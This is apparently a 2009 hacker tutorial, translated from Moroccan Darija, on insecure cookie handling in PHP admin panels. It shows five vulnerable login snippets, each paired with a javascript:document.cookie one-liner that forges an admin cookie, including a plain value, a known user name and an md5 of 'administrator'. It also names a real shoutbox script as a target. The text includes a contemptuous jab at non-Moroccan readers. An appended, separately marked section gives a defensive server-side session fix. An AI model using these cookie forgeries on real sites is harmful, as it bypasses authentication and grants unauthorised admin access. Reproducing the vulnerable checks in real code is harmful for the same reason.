|=--------------------------------------------------------------------=|
|=-------------=[ Playing with cookies (ST1) (Morocco) ]=-----------=|
|=-----------------------=[ 25 February 2009 ]=-----------------------=|
|=---------------------=[ By Mountassif Moad ]=---------------------=|
|=--------------------------------------------------------------------=|

########### For the sons of the country and Moroccans till death ##########

###### Info ######

###########################################################################
[+]                                                                     [+]
[+] Language : Moroccan Darija                                          [+]
[+] By       : Mountassif Moad (Stack)                                  [+]
[+] Website  : www.v4-team.com                                          [+]
[+] Date     : 2009-02-25                                               [+]
[+] MilHome  : http://www.milw0rm.com/author/1331                      [+]
[+]                                                                     [+]
###########################################################################

########## Contents ##########

[0x00] - Introduction
[0x01] - Walkthrough
[0x02] - Conclusion
[0x03] - Greets to
[0x04] - Credits

#######################
[0x00] - Introduction
#######################

Peace be upon you. Today I felt like it, so I said, let me explain to our countrymen how to find cookie vulnerabilities, the ones called Insecure Cookie Handling Vulnerability. I wrote this in Darija so that only our countrymen understand it, and not those other monkeys who, as you and I know, are ungrateful. With any luck we explain it in Darija and they won't understand a thing :d Whoever wants to understand can go learn Darija hhhhhh

##########
[0x01] - Walkthrough
##########

----- 1 -----

Anyway, let's start by looking at PHP code.

PHP code 1:

    if ($_COOKIE["login"] == "OK") {
        header("location: admin.php");       // cookie login=OK found: straight to the admin page
    } else {
        echo "lekmala diyale la page php ";  // placeholder for the rest of the page
    }

Here the code checks whether the cookie login=OK is stored in your browser. If it finds it, it sends you on to admin.php; if the cookie is missing or not right, it renders the rest of the page and you don't get into admin. Let's try it on an example.

----- 2 -----

This one: http://www.milw0rm.com/exploits/5845
Download it from here: http://www.zeldaforums.net/scripts/myshoutpro1.2.zip

Anyway, we open the file admin.php, and at line 37 there is this code.

PHP code 2: (not reproduced in the text)

So here we see that $admin_cookie = admin_access, and there is an (if), meaning: if $admin_cookie == "", that is admin_access == "". The "" here stands for anything, or nothing at all; so admin_access=0 does the job.

Exploit:
    javascript:document.cookie = "admin_access=0; path=/";

After you run the exploit, the message "You are logged in. Click here to proceed." appears. Click it and you are in the admin.

----- 3 -----

Now let's move on to another code.

PHP code 3:

    if ($user == $username && $pass == $password){
        setcookie("login", "OK", time());   // third argument is the expiry; time() means "now"
    }

We focus on this line => setcookie("login", "OK", time()); setcookie is a PHP function; if you want to read about it, see http://fr.php.net/setcookie. This function defines what gets sent to the cookies, and since here it is the words login & OK, it could just as well be setcookie("login", "OK"). Anyway, the exploit for this one is as easy as the previous ones.

Exploit:
    javascript:document.cookie = "login=OK; path=/";

---- 4 ----

PHP code 4:

    $user=$_POST['username'];
    $pass=$_POST['password'];
    $select_admin = mysql_query("SELECT * FROM cms_admin");   // old mysql_* extension
    while($dati_admin=mysql_fetch_array($select_admin)){
        $username=$dati_admin['username'];                     // keeps the last admin row
        $password=$dati_admin['password'];
    }
    if ($user == $username && $pass == $password){
        setcookie("login", $username, time());
    }

Here things are a bit trickier; let's explain this code. In setcookie("login", $username, time()); we notice the variable $username. This variable $username = username, and that is the admin's. So for it to work for us we must know the admin's user name. For example, if the admin's user name = administrator, the exploit will be:

Exploit:
    javascript:document.cookie = "login=administrator; path=/";

---- 5 ----

PHP code 5, roughly like this:

    $user=$_POST['username'];
    $pass=$_POST['password'];
    $select_admin = mysql_query("SELECT * FROM cms_admin");
    while($dati_admin=mysql_fetch_array($select_admin)){
        $username=$dati_admin['username'];
        $password=$dati_admin['password'];
    }
    if ($user == $username && $pass == $password){
        setcookie("login", md5($username), time());   // same as code 4, but the value is md5 of the name
    }

This code is like the one in example 4, but here there is one addition, hashing with md5. Look with me at this line: setcookie("login", md5($username), time()); setcookie we already explained; login is the name the setcookie function sends to the cookies; md5($username) means the user name hashed with md5. So if the admin user name is not md5-hashed here, we won't get into the admin panel, and the exploit will be:

Exploit:
    javascript:document.cookie = "login=200ceb26807d6bf99fd6f4f0d1ca54d4; path=/";

administrator = 200ceb26807d6bf99fd6f4f0d1ca54d4

-------------------------------------------------------------------------

#######################
[0x02] - Conclusion
#######################

Great work, ya salam. Wait for a video that will be nice: another method for finding insecure cookies.

#######################
[0x03] - Greets to
#######################

All Moroccans :d especially: Houssamix & simo-soft & djekmani & Gor & Simo64 & Sec-alert & issam & me :d
The dear Egyptians: darbate mi9asse haji

------[ 0x04 - Credits ]

Author: Mountassif Moad
mail: you don't need it any more :d
site: http://v4-team.com
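A server-side alternative to the cookie checks in codes 1 to 5 above, added here as an example and not part of the original text or of the scripts it discusses. The table cms_admin(username, password_hash), the PDO handle $pdo and the function names admin_login / require_admin are assumptions, not the schema of the shoutbox script.

```php
<?php
declare(strict_types=1);

// Added example, not from the original text or the scripts it discusses.
// Every value in $_COOKIE is chosen by the browser, so "login=OK", a user
// name, or md5(user name) (md5 of a known name is computable by anyone) can
// all be forged. The server should only trust state it keeps itself, looked
// up by a session id it issued. Assumed schema: cms_admin(username,
// password_hash) holding password_hash() values; $pdo is an assumed PDO handle.

// Session cookie flags: not readable by page script, HTTPS only, not sent on
// cross-site requests. Must be set before session_start().
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();

function admin_login(PDO $pdo, string $user, string $pass): bool
{
    // Parameterised query instead of the unfiltered mysql_query() loop.
    $stmt = $pdo->prepare('SELECT password_hash FROM cms_admin WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the user is unknown, so response time
    // does not reveal which user names exist.
    $hash = $row ? $row['password_hash'] : password_hash('dummy', PASSWORD_DEFAULT);
    if (!password_verify($pass, $hash) || !$row) {
        return false;
    }

    // New session id on privilege change (against session fixation); the admin
    // flag lives on the server, never in a cookie value the client can edit.
    session_regenerate_id(true);
    $_SESSION['admin'] = true;
    $_SESSION['user']  = $user;
    return true;
}

function require_admin(): void
{
    // Replaces if ($_COOKIE["login"] == "OK"): the decision rests on the
    // server-side session, not on a value supplied by the request.
    if (empty($_SESSION['admin'])) {
        header('Location: login.php');
        exit;   // stop rendering the admin page after the redirect
    }
}
```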